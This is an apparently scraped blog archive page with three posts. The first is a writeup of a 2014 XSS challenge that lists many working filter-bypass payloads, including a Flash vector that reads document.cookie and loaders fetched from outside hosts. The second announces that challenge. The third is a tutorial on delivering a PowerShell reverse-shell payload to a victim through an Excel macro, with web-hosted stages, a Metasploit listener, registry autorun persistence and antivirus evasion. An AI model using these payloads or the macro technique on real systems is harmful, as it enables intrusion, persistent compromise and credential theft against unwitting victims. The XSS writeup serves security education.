KNOX D3: January 2014

Rhainfosec XSS Challenge 1 - Writeup

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfhJZXCBdTJSXWKisZX2ypYe4aCdZbBJTH7GcxrtuvdZZ9P-mHZHkHi7mOnsIq4jLi9TRnfC840_EdTfu8qImmjtrmQXa-llqrHcJ_OC53nTvx9YITSLnjG-L1tjurPTbV72B5ZH1vtIg/s1600/2008-gce-o-levels-results.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfhJZXCBdTJSXWKisZX2ypYe4aCdZbBJTH7GcxrtuvdZZ9P-mHZHkHi7mOnsIq4jLi9TRnfC840_EdTfu8qImmjtrmQXa-llqrHcJ_OC53nTvx9YITSLnjG-L1tjurPTbV72B5ZH1vtIg/s1600/2008-gce-o-levels-results.jpg" width="577" /></a></div><br /><br /><b>Update </b>- The challenge is still up on hack.me -<a href="https://hack.me/101575/bypass-blacklist-based-waf-challenge.html" rel="nofollow" target="_blank"> <b>https://hack.me/101575/bypass-blacklist-based-waf-challenge.html</b></a><br /><b><br /></b>On 7th January 2014, we announced an XSS challenge for the whole infosec community, the challenge was based upon blacklist based protection and the task was to bypass the blacklist based protection and to execute the javascript. Based upon unique IP addresses we had <b>1740 </b>participants and more then <b>80k</b> unique vectors were recorded into our log file which is a tremendous turn out, the size of the log file was around 4.4 mb, which is pretty huge. Out of 1740 participants only 17 were able to solve it, which is less then 1% (0.97 to be exact). <br /><a name='more'></a><br /><h4>Challenge Setup</h4>To make your lives a bit harder, we induced certain amount of difficulties. Here is an overview of what we had done:<br /><br /><ul style="text-align: left;"><li>We blacklisted alert, prompt, confirm, document.write functions which are most commonly used to execute javascript. </li><li>We blacklisted open & closed parenthesis, which is what most of the XSS vectors require. </li><li>We blacklisted most commonly used event handlers such as onclick, onfocus etc</li><li>We blacklisted the closing bracket ">". </li><li>We blacklisted most of the attributes used to execute javascript such as src, formaction, action etc. </li><li>We blacklisted "+" sign, which otherwise would had been used to concatenate javascript strings, however we did leave a room for it. (More on it later). </li><li>The winners for the challenge would be decided on the basis of the shortest vector by length. </li></ul><div><h4>Hints</h4></div><div>The two of most important hints we gave was as follows:</div><div><ul style="text-align: left;"><li>Look at alternative javascript execution possibilities. </li><li>The solution for the challenge was already given inside my "<a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" target="_blank">XSS filter evasion cheat sheet</a>", however you would need tweak the payload. <b>(Obviously, there was not point to the challenge, if the solution was already there)</b>.</li></ul></div><div><h4>Partial Bypass - Solution</h4></div><div>As it was mentioned in one of the hints that you would need to look at alternative javascript execution possibilities. Almost all attributes were being filtered except the "<b>code</b>" and "<b>data</b>" attribute. The "<b>code</b>" attribute can be used along with the "<b>embed</b>" element and the "<b>data</b>" attribute can be object element to execute the javascript. </div><div><br /></div><div><b>Vector #1 </b></div><div><br /></div><div>Several instances of the "<b>Object</b>" element were being filtered, however it wasn't difficult for some one to figure it out. The "<b>data</b>" attribute was being filtered out too, however case-sensitive based escaping was not being done. Therefore the final vector would be: </div><div><br /></div><div><b><OBJECt/DATA=//0x.lv/xss.swf??</b></div><div><br /></div><div><br /></div><div><span style="font-weight: bold;">Vector #2</span></div><div><br /></div><div>A more easier partial solution would be to use "<b>embed</b>" element with "<b>code</b>" attribute: </div><div><br /></div><div><b><embed/code=//0x.lv/xss.swf??</b></div><div><br /></div><div>The reason, why i have coined the solutions as "<b>Partial solution</b>" is because of the fact that the javascript does not executes under the context of the main domain, "<b>rafay.prakharprasad.com</b>", for it to be termed as a full solution, the javascript must be executed under the context of the challenge domain. </div><div><br /></div><div>The following people who came up with partial bypass:</div><div><br /><b>@yappare</b><br /><complete><br /></complete><complete><u>http://rafay.prakharprasad.com/?search=</u><u><Object/Data=//goo.gl/nlX0P?</u></complete><br /><b><complete><br /></complete></b><b><complete id="goog_2023099574">@sasilevi</complete></b></div><div><u><br /></u><u>http://rafay.prakharprasad.com/?search=</u><u><Object/Data=//goo.gl/nlX0P?</u><br /><b><br /></b><b>@irsdl </b><br /><br /><u>http://rafay.prakharprasad.com/?search=</u><u><objecT/Data=//0x.lv/xss.swf?</u><br /><u><br /></u><b>@soaj1664ashar</b><br /><br /><u>http://rafay.prakharprasad.com/?search=</u><u><embed/code=//goo.gl/nlX0P?</u><br /><u><br /></u><u><b>@insertscript</b></u><br /><u><br /></u><u>http://rafay.prakharprasad.com/?search=%3CObjEct%2FdaTA=//dl.dropboxusercontent.com/u/13018058/ttt.htm?</u><br /><u><br /></u><br /><u><b>@TurbanatorSJS</b></u><br /><u><b><br /></b></u><u>http://rafay.prakharprasad.com/?search=<embed/code=//jsfiddle.net/ETCMn?</u><br /><h4>Full Bypass - Solution</h4></div><div>Let's first take a look at our solution and then take a look at amazing solutions from the community, we used window.open() function to set the name property to "javascript:alert(1)", we used string concatenation to join the "l" and "ocation" together, the "+" sign was being filtered out, however the encoded version of "+" was not being filtered out which is equivalent to "%2b".<br /><br /><b>Browsers: <span style="color: red;">IE and Firefox</span></b></div><div><blockquote class="tr_bq"><b><html></b><b><script> </b><b>window.open('//rafay.prakharprasad.com/?search=%3Cbody/onload=this[/l/.source%2b/ocation/.source]=name//',"javascript:alert(1)"); </script></b><b></html></b></blockquote>Let's now try the tremendous solutions we received from the community:<br /><h4>1)@skeptic_fx</h4></div><div>Ahamed Nafeez was the first to solve the challenge by our expected method, The following solution works in Firefox w/o user interaction.<br /><br /><b>Length: </b><span style="color: red;">58 characters</span><br /><br /><b>POC #1</b><br /><blockquote class="tr_bq"><html><br /><script><br />var a = window.open('http://rafay.prakharprasad.com/?search=<marquee/onstart=this[/innerHTM/.source%2Bname[0]]=name;//',<br />  'L<img src=x onerror=alert(document.domain)>');<br /></script><br /></html></blockquote><br />Later, he made it work inside both Internet explorer and Firefox:<br /><br /><b>Length:</b> <span style="color: red;">121 characters</span><br /><br /><b>POC #2</b><br /><blockquote class="tr_bq">http://rafay.prakharprasad.com/?search=<marquee/onstart=this[/innerHTM/.source%2B/L/.source]=window[/locatio/.source%2B/n/.source][/has/.source%2B/h/.source];//#<img src=x onerror=alert(document.domain)></blockquote><h4>2)@fransrosen</h4>Frans rosen came up with a very sophisticated bypass, The vector could had been shortened a lot though, but he decided not to do it, even though he could had. He used parentNode to walk to up the document, however all of these parentNodes could had been replaced with "top" or "self" and the POC still had worked, however this turns out to be a great technique in a case top and self keywords have been blacklisted.<br /><br /><b>Length:</b> <span style="color: red;">366 Characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq">http://rafay.prakharprasad.com/?search=%3Csvg/onload=g=parentNode.parentNode.parentNode.parentNode.parentNode.parentNode;h=g[/loc/.source%2b/ation/.source]; g[/loc/.source%2b/ation/.source]=/javascrip/.source%2b/t/.source%2bh[/has/.source%2b/h/.source][1]%2b/aler/.source%2b/t/.source%2bh[/has/.source%2b/h/.source][2]%2b/documen/.source%2b/t./.source%2b/domain/.source%2bh[/has/.source%2b/h/.source][3]%0c#:%28%29</blockquote><h4>3)@insertscript</h4>Alex, next came up with a nice and clean cross-browser bypass:<br /><br /><b>Length:</b> <span style="color: red;">53 characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq"><div<br />onclick=window.open('http://rafay.prakharprasad.com/?search=<svg/onload=top[/locatio/.source%2b/n/.source]=name//',"javascript:alert(1)");>click</div></blockquote><h4>4)@hasegawayosuke</h4>Hasegawa next came up with an amazingly short IE9 specific bypass using "onactivate" event handler, which only works with<br />internet explorer.<br /><br /><b>Length: </b><span style="color: red;">27 Characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq"><!doctype html><br /><html><br /><head><br /><meta charset="utf-8"><br /><title></title><br /></head><br /><body><br /><a href="http://rafay.prakharprasad.com/?search=<body/onactivate=URL=name//" target="javascript:alert(location.href)">Click Here</a><br /></body><br /></html></blockquote><h4>5)@avlidienbrunn</h4>Mathias came up with several different solutions namely a universal solution that would work on all browsers and a chrome specific bypass with shortened length.<br /><br /><b>Length: </b><span style="color: red;">97 characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq"><script>window.open("http://rafay.prakharprasad.com/?search=<svg/onload=c=/locatio/+/n/;c=c[1]+c[2]+c[3]+c[4]+c[5]+c[6]+c[7]+c[10];window[c]=window.name%2509", "javascript:alert(1)");</script></blockquote><br />Along with his solution, he was kind enough to send an explanation on how it worked:<br /><br />This solution relies upon setting the window.location property to a javascript URI. We can do this by accessing the property using the syntax with a string within brackets instead of the regular way (window["location"] versus window.location). Since a lot of strings were filtered (such as "alert" and "location"), we can use the same window.name trick to go transfer a string to the page. In the example I passed "<b>javascript:alert(1)</b>".<br /><br />Sadly, only one string can be passed with that trick and as for the other string ("location"), I forged it by building a desired string out of another, character by character. But to do that I needed a string in the first place, so I used regex and addition to cast it into a string. /locatio/+/n/ becomes "/locatio//n/". From there we can just pick character by character and glue it together to make "location".<br /><br />In the end we set window[string_from_regexes]=string_from_window_name, which becomes window["location"]="javascript:alert(1)", executing the alert.<br /><br />Later, he came up with a chrome specific bypass of only 32 characters in length:<br /><br /><b>Length: </b><span style="color: red;">32 Characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq">data:text/html,<meta name="referrer" content="always"><img src=x onerror="if(/^data/.test(location.href)){window.name='innerHTML';location='http://rafay.prakharprasad.com/?search=%3Csvg/onload=body[name]=referrer%2509'}else{alert(1)}"></blockquote><h4>6)@yujikosuga</h4>Yuji arrived in a bit late inside the challenge, but still managed to solve it in a decent amount of time.<br /><br /><b>Length: </b><span style="color: red;">57 characters</span><br /><blockquote class="tr_bq"><svg onload="name='javascript:alert(1)',location='//rafay.prakharprasad.com/?search=%3Cbody/onload=this[/l/.source%2b/ocation/.source]=name//'"></blockquote><h4>7)@philroberts & <complete id="goog_1754957659">@adam_baldwin</complete></h4><br />Phil roberts next, came up with a huge and the most longest solution in terms of length.<br /><br /><b>Length:</b> <span style="color: red;">527 characters</span><br /><span style="color: red;"><br /></span><b>POC #1</b><br /><blockquote class="tr_bq">http://rafay.prakharprasad.com/?search=%3Csvg/onload=z=[]%2batob;l=z[13];r=z[14];s=z[8];a=[]%2b/tnemucod/;a=a[8]%2ba[7]%2ba[6]%2ba[5]%2ba[4]%2ba[3]%2ba[2]%2ba[1];b=[]%2b/LMTHrenni/;b=b[9]%2bb[8]%2bb[7]%2bb[6]%2bb[5]%2bb[4]%2bb[3]%2bb[2]%2bb[1];c=[]%2b/Fa=crsFgmi%3C/;c=c[11]%2bc[10]%2bc[9]%2bc[8]%2bs%2bc[6]%2bc[5]%2bc[4]%2bc[3]%2bc[2]%2bs;d=[]%2b/X1Ztrela=rorreno/;d=d[16]%2bd[15]%2bd[14]%2bd[13]%2bd[12]%2bd[11] %2bd[10]%2bd[9]%2bd[8]%2bd[7]%2bd[6]%2bd[5]%2bd[4]%2bl%2bd[2]%2br;window[a].body[b]=c%2bd%2bwindow[a].body[b][8]//</blockquote><b>Update: Philip has written an explanation for his huge solution here - <a href="https://gist.github.com/latentflip/8580688" rel="nofollow" target="_blank">https://gist.github.com/latentflip/8580688</a></b><br /><br />Later, he managed to shorten it upto 97 characters:<br /><br /><b>Length:</b><span style="color: red;"> 97 Characters</span><br /><b><span style="color: red;"><br /></span></b><b>POC #2</b><br /><blockquote class="tr_bq"><svg/onload=a=[]%2b/trela/;a=a[5]%2ba[4]%2ba[3]%2ba[2]%2ba[1];window.onerror=window[a];throw/1///</blockquote><h4>8)@mramydnei</h4><b>Length:</b> <span style="color: red;">140 characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq">http://rafay.prakharprasad.com/?search=%3Csvg/onload=a=[]%2b/trela/;a=a[5]%2ba[4]%2ba[3]%2ba[2]%2ba[1];window.onerror=window[a];throw/1///</blockquote><h4>9)@kinugawamasato</h4>King Masato surprised me with his amazing solutions, he first came up with a very sophisticated bypass and then managed to shorten the vectors up to 25 characters. How awesome is that!<br /><br /><b>Length: </b><span style="color: red;">28 characters</span><br /><br /><b>POC #1</b><br /><blockquote class="tr_bq"><script><br />window.name="innerHTML";<br />  location.href="http://rafay.prakharprasad.com/?search=<svg/onload=body[name]=URL%0d#</svg><img src=x onerror=alert(1)>"<br /></script></blockquote>The above vector would work upon both IE and chrome browsers, it won't work on firefox because of the fact that firefox encodes certain characters after the hash. The technique is very useful for bypassing server side filters as payload sent after the hash is not sent to the server and hence our WAF was not able to detect the payload and there managed to bypass.<br /><br />Later masato came up with an amazing chrome specific solution:<br /><br /><b>Length: </b><span style="color: red;">25 characters</span><br /><br /><b>POC #2</b><br /><blockquote class="tr_bq"><script><br />document.domain='com';<br />function go(){<br /><span class="Apple-tab-span" style="white-space: pre;"> </span>w=window.open("http://rafay.prakharprasad.com/?search=<svg/onload=domain=name//","com");<br /><span class="Apple-tab-span" style="white-space: pre;"> </span>var s=setInterval(function(){<br /><span class="Apple-tab-span" style="white-space: pre;">  </span>if(w.document.domain=='com'){<br /><span class="Apple-tab-span" style="white-space: pre;">   </span>w.alert(1);<br /><span class="Apple-tab-span" style="white-space: pre;">   </span>clearInterval(s);<br />   <span class="Apple-tab-span" style="white-space: pre;">  </span> }<br /><span class="Apple-tab-span" style="white-space: pre;"> </span>},100)<br />}<br /></script><br /><button onclick=go()>go</button></blockquote><h4>10) @dnkolegov</h4>Denis, came up with three different solutions and in the end managed to shorten it upto 77 characters.<br /><br /><b>Length:</b> <span style="color: red;">77 characters</span><br /><b><br /></b><b>POC:</b><br /><br />http://rafay.prakharprasad.com/?search=<svg/onload=t=/aler/.source%2b/t/.source;window.onerror=window[t];throw%2b1//<br /><h4>11) @0x6D6172696F</h4>Dr Mario Heidrech also came up with a superb bypass using Vbscript, The current solution works upto IE 10. He was also able to solve the challenge inside of IE 11 by getting IE 11 to load up the page inside the document mode, however the solution cannot be disclosed yet as it's pending a fix. <br /><br /><b>Length:</b> <span style="color: red;">34 characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq"><svg/language=vbs onload=msgbox-1</blockquote><h4>12)Garrett Calpouzos</h4><div>Garrett utilized the throw technique to solve the challenge, which was one of the hints which we i had given before. </div><div><br /></div><b>Length: </b><span style="color: red;">130 characters</span><br /><blockquote class="tr_bq"><body/onload=a=/aler/.source;b=/t/.source;onerror=window[a%2bb];throw[base.parentNode.parentNode.parentNode.parentNode.domain];%09</blockquote><h4>13)@soaj1664ashar</h4>Ashar javed came up with several partial bypasses and a full bypass:<br /><br /><b>Length:</b> <span style="color: red;">71 characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq"><body/onload=id=/al/.source%2b/ert/.source;onerror=this[id];throw%2b1//</blockquote><h4>14)@netfuzzer</h4>Mario gomes came up with several valid solutions and finally managed to settle it without user interaction with a 63 character payload.<br /><br /><b>Length: </b><span style="color: red;">63 characters</span><br /><blockquote class="tr_bq">data:text/html,<script>window.name="javascript:alert(/XSSED/.source);";location="http://rafay.prakharprasad.com/?search=<svg/onload=window[/locatio/.source%252b/n/.source]=window.name//"</script></blockquote><h4>15) @shafigullin</h4>Shafigullin, as always came up with a very cool solution. He took the "l" character from the URL[61] and then concatinated the "l" to "ocation" from the ID attribute. A very neat trick to get things done.<br /><br /><b>Length:</b> <span style="color: red;">50 characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq">http://xss-shafigullin-pro.appspot.com/reflector?protection=0&content=%3Cscript%3Ename=%27javascript:alert(1)%27;location=%27http://rafay.prakharprasad.com/?search=%3Csvg/id=ocation%2509onload=top[URL[61]%252bid]=name%2509%27%3C/script%3E<br />The following is the payload that would be sent to the server:<br /><svg/id=ocation%09onload=top[URL[61]%2bid]=name%09</blockquote><h4>16)@cgvwzq</h4>Pepevila also came up with an exceptional solution. In short, he stores "source" inside of the <b>s</b> variable and  location inside the $ variable and top.location inside  _ to shorten his vector. He then applies it to top[$] which is equivalent to (top["location"]), then he uses _.hash[1] to extract the ":" after the hash and finally extracts "-alert(1)" from location.pathname.<br /><br /><b>Length: </b><span style="color: red;">153 Characters</span><br /><br /><b>POC</b><br /><blockquote class="tr_bq">http://rafay.prakharprasad.com/1/-alert%281%29?search=%3Csvg/onload=s=/source/.source;$=/locatio/[s]%2B/n/[s];_=top[$];top[$]=/javascrip/[s]%2B/t/[s]%2B_[/has/[s]%2B/h/[s]][1]%2B_.pathname//#:</blockquote><h4>- <u>http://bit.ly/1dgBYJT</u></h4><h4>17)@irsdl</h4>Soroush was one the first to come up with a partial bypass, however later he surprised me by being able to execute javascript under the context of the challenge domain by loading an external flash file. He basically managed to bypass Flash sandbox security inside Firefox (and later all browsers) by using JAR protocol and NavigateToURL.<br /><br /><b>Length:</b><span style="color: red;"> 24 characters</span><br /><br /><b>POC #1</b><br /><br /><b>http://rafay.prakharprasad.com/?search=<Object/Data=//0me.me/r</b><br /><br />Along with it, he also sent an explanation on how he was able to bypass the flash sandbox security inside of firefox first and then for all browsers.<br /><br /><b>Source Code of the Flash File:</b><br /><br />navigateToURL(new URLRequest("jar:javascript:alert('domain: '+document.domain+'\\r\\nCookies: '+document.cookie);"),"testme");<br /><br /><b>1- </b>target page name has been set to "testme" as "", "_self", "_top", and "_parent" are not allowed when we do not have (allowScriptAccess="always") in Object tag in HTML. it causes Security sandbox violation. Therefore, I have chosen a name for my target page ("testme").<br /><br /><b>2-</b> We cannot use Javascript: protocol in NavigateToURL as it raises another Security sandbox violation without having proper allowScriptAccess. However, if I use JAR: protocol, this will will be bypassed (http://soroush.secproject.com/blog/2013/10/catch-up-on-flash-xss-exploitation-part-2-navigatetourl-and-jar-protocol/).<br /><br /><b>3- </b>Now I just need to open this Javascript protocol with Jar protocol in a blank page that inherits its opener. However, this method does not work in IE and Google Chrome very well as they do not popup a new window easily! We can still exploit this if our current window name is "testme" as it does not need to open a new window! as Iframe is blocked, we can use an A tag with target to "testme" which embeds the attacker's flash file! attacker's flash file will open a Javascript in "testme" (the same) window.<br /><br />Obviously the solution can still be shortened by using a more smaller domain.<br /><b><br /></b><b>POC# 2 </b><br /><br /><b>Length: </b><span style="color: red;">22 characters</span><br /><br />Apart from firefox, Soroush also managed to bypass flash based sandbox protection inside of all the browsers and came up with an amazing 22 characters.<br /><b><br /></b><b>Solution</b><br /><b><br /></b><b><a href="http://rafay.prakharprasad.com/?search=<Object/Data=//0me.me/" target="testme"> Click Here</a></b><br /><br /><u>http://jsfiddle.net/P9trW/</u><br /><u>http://jsfiddle.net/P9trW/1</u><br /><b><u><br /></u></b><b><u>Note: The bypasses have been patched by Flash security team as per now</u></b><br /><br /><b>Winners</b><br /><b><br /></b>The winners are obviously transparent from above solutions, the winners were determined based upon the length of the vector.<br /><br /><b>1)</b> <u>Soroush Dallili </u><b>(22 Characters)</b> // <span style="color: red;">Cross Browser Bypass</span><br /><b>2)</b> <u>Masato Kinugawa</u> <b>(25 Characters)</b> // <span style="color: red;">Chrome Specific Bypass</span><br /><b>3) </b><u>Yosuka Hasegawa</u> <b><u>(</u>27 Characters) </b>// <span style="color: red;">Internet Explorer Specific Bypass</span><br /><br /><b>Conclusion</b><br /><b><br /></b>The challenge was based upon strict black list based filtering, however the bypasses prove that blacklist based filters shall not be relied as your only defense mechanisms.<br /><br />In case, if i have missed any of your submission, please let me know, I'll update the challenge. I would like to sincerely thank "<b>Frans Rosen</b>", "<b>Mathias</b>" and "<b>Prakhar Prasad</b>" and "<b>Alex Infuhr</b>" for helping me analyzing the solutions and with other aspects of the challenge. I hope you had fun in doing the challenge and hopefully learned some thing new, just like us by analyzing your solutions.<br /><br />I would love to hear your feedback! Pass your comments. </div></div>

Rhainfosec XSS Challenge 1 - Writeup

Update - The challenge is still up on hack.me - https://hack.me/101575/bypass-blacklist-based-waf-challenge.html On 7th January 2014, we a...

+ Read more »

RHAinfoSec XSS Challenge - 1

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWQ9-T4c1h6Vgnk7qUKV-v0Onstl8z9hOIIWVZV0CHTx3gzwt2a3355ue9sGQsCmeg-kT9WmX1QP7PmGsgMEFB16t8yEeGsJnyqmr49RHQ8sEX-YjJSFtbyQf9eQJj-2Om1OWWV_yld14/s1600/ChallengeLogo-angled-full-JPEG.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWQ9-T4c1h6Vgnk7qUKV-v0Onstl8z9hOIIWVZV0CHTx3gzwt2a3355ue9sGQsCmeg-kT9WmX1QP7PmGsgMEFB16t8yEeGsJnyqmr49RHQ8sEX-YjJSFtbyQf9eQJj-2Om1OWWV_yld14/s1600/ChallengeLogo-angled-full-JPEG.jpg" width="320" /></a></div><br /><br />Welcome readers,<br /><div><br /></div><div>This turns out to be the first post of the Year 2014, I would like to start this post by wishing you a very happy new year, sorry for the delay as i was extremely occupied with my final examinations. And as they are over by now, i would like to start this year by putting up a small challenge for my readers. </div><div><a name='more'></a></div><div><br />Recently, we had released our "<a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" target="_blank"><b>XSS Filter Evasion Cheat Sheet</b></a>", i was extremely overwhelmed with the response of the readers, the downloads have surpassed an amazing figure of 4500+ and more are coming every day. Therefore, i thought to put up a challenge, which would force you to use the techniques you would had learned from the cheat sheet and put you to the test. </div><div><br /></div><div>The challenge is based upon a WAF (Web Application Firewall) we encountered recently while pentesting a website, as it's against our policies and TOS to disclose the website which we were up against, however i was able to reverse engineer the rules and therefore managed to create my own filter simulating the rules of the one which we were up against.<br /><br /><h4>Challenge Link</h4><div>Special thanks to Mr prasad, for deploying the challenge upon his server. </div><ul style="text-align: left;"><li><b><a href="http://rafay.prakharprasad.com/" rel="nofollow" target="_blank">http://rafay.prakharprasad.com/</a></b></li></ul></div><div><h4>Challenge Goals</h4></div><div><ul style="text-align: left;"><li>The challenge goal is to execute the javascript.</li><li>Your payload must render javascript inside any modern browser. </li><li>The XSS protection header has been set to 0, which would turn off your client side XSS filter. </li></ul><div><h4>Tips</h4></div></div><div><ul style="text-align: left;"><li>If all you can do is <b>"><img src=x onerror=prompt(1);></b>, then this challenge is not for you. </li><li>The WAF can be very hard, if you don't know how to properly reverse engineer filter rules. </li><li>The solution for the challenge has already been given inside my "<b><a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" target="_blank">XSS Filter evasion Cheat sheet</a></b>", However you would need to tweak the payload.</li><li>Your scanners won't help here, so don't waste your time with them. </li></ul><div><h4>Submissions</h4></div></div><div>Sumbit your vector to <b><u>rafayhackingarticles@gmail.com</u></b> or<b> <u>prakhar@prakharprasad.com</u></b>, once you have cracked this challenge.</div></div>

RHAinfoSec XSS Challenge - 1

Welcome readers, This turns out to be the first post of the Year 2014, I would like to start this post by wishing you a very happy new year,...

+ Read more »

Deliver powershell payload using macro.

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: left;">In past we saw method of <a href="http://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html">direct shell code execution in Ms word or Excel using macro</a>;but if document is closed then we will lose our shell so we have to migrate to other process and sometimes migration is pick up by AV. So in this tutorial we are going to use powershell payload.</div><h3 style="text-align: left;">Advantages of this method:-</h3><div style="text-align: left;"><br />(1)<a href="http://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html">Persistence</a><br />(2)Migration is not needed<br />(3)<a href="http://tipstrickshack.blogspot.com/search/label/bypass%20AV">AV bypass</a><br /><br />(1)First we will generate powershell payload; for this purpose i used SET.You can also used <a href="http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-veil-in-backtrack.html">Veil</a> or powersploit.Open SET in terminal & select Social-Engineering Attacks and then Powershell Attack Vectors.Generate Powershell Alphanumeric Shellcode Injector.Fill LHOST & LPORT value.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIgJcFI6vBMVRPP2LAFm1P5k42FZU7A23eG6xlTKEfg74-Vynv8AYo7K419uAMcyxEfqNkX7i1EMOiX-sGz4JapkpLUBX9aJqxOMlovAy2zxrIe64UuceWp3HcS-HgTdDC_85OKK5PzLBc/s1600/set-powershell-payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="SET-powershell-payload" border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIgJcFI6vBMVRPP2LAFm1P5k42FZU7A23eG6xlTKEfg74-Vynv8AYo7K419uAMcyxEfqNkX7i1EMOiX-sGz4JapkpLUBX9aJqxOMlovAy2zxrIe64UuceWp3HcS-HgTdDC_85OKK5PzLBc/s1600/set-powershell-payload.png" title="SET-powershell-payload" width="200" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;">Our generated powershell payload is located into /root/.set/reports/powershell/. Rename x86_powershell_injection.txt to x32.ps1.</div><a name='more'></a><br />(2)Now Clone git repository of code<br /><br />root@bt:~# <u>git clone https://github.com/enigma0x3/Old-Powershell-payload-Excel-Delivery</u><br /><div style="text-align: left;">root@bt:~# <u>cd Powershell-payload-Excel-Delivery/</u><br /><br />(3)In Powershell-payload-Excel-Delivery folder; rename RemovePayload.bat to remove.bat. Now you have to host remove.bat and x32.ps1 to web-server.Then open persist.vbs file and change URL of x32.ps1 in line 13,33 to your hosted x32.ps1 `s URL. And now also host persist.vbs to web-server. I used localhost.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgit1pKVe3tOcR-B7zawiC9w3QIzpb2UTobLzkBm_BdqfAaUIwIemGKi2lGRrSIGonLN86bxGDZVVPpjf2OIhoEoBpVucncgBnlQhLD223MS1mb44u3jdX-_SoieSPe3p9Ed0_MyqHsB8f_/s1600/host-on-local-server.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="hosted-payload" border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgit1pKVe3tOcR-B7zawiC9w3QIzpb2UTobLzkBm_BdqfAaUIwIemGKi2lGRrSIGonLN86bxGDZVVPpjf2OIhoEoBpVucncgBnlQhLD223MS1mb44u3jdX-_SoieSPe3p9Ed0_MyqHsB8f_/s1600/host-on-local-server.png" title="hosted-payload" width="400" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">(4)Open Macrocode file from cloned folder & change URL in line 27,82,118 respectively to your hosted x32.ps1,persist.vbs and remove.bat `s URL.Now add this macro code into excel document as mentioned in <a href="http://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html">previous tutorial</a>.<br /><br />(5)And last step is setup listener.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA1rdJchfuPwT3tKJYJTP_7QbN8m0owlBsqdQe7X5Kna4SH_efFE9bkB5MS0a0ajEuWlVUurZY_4vNjCZhXJF6o-8GNJ1EGiAdz10OlD8rJbMqafGlIqSJ-pnHEmMXLmuzj5iPuKiP91Qb/s1600/metasploit-lisetner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="metasploit-listener" border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA1rdJchfuPwT3tKJYJTP_7QbN8m0owlBsqdQe7X5Kna4SH_efFE9bkB5MS0a0ajEuWlVUurZY_4vNjCZhXJF6o-8GNJ1EGiAdz10OlD8rJbMqafGlIqSJ-pnHEmMXLmuzj5iPuKiP91Qb/s1600/metasploit-lisetner.png" title="metasploit-listener" width="200" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Now send this document to victim , as soon as he open document and run macro we will get shell. Once the payload is ran, it runs in the powershell process, so if the user closes excel, you keep your shell. You also remain in a stable process until reboot, so migration is not needed.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvbrFs_v1zB1DKVg9CPrc4ADuIdkbdQ2L-obGub0jxIiVU6iudOKyd6eO8kRK7BvODfj0WwN_3x6eHnc-fSKa50xJUKYTV81YOpWniqOvqFK71su3yzWFTinqyTO2VKCHVOBy5wHGvfqh6/s1600/powershell-process.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="powershell-process" border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvbrFs_v1zB1DKVg9CPrc4ADuIdkbdQ2L-obGub0jxIiVU6iudOKyd6eO8kRK7BvODfj0WwN_3x6eHnc-fSKa50xJUKYTV81YOpWniqOvqFK71su3yzWFTinqyTO2VKCHVOBy5wHGvfqh6/s1600/powershell-process.png" title="powershell-process" width="200" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">It then pulls down a persistence script, drops it, creates a registry key for autorun for the persistence script. Once done, it also drops a self-deleting bat file that removes the initial payload from the system.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a 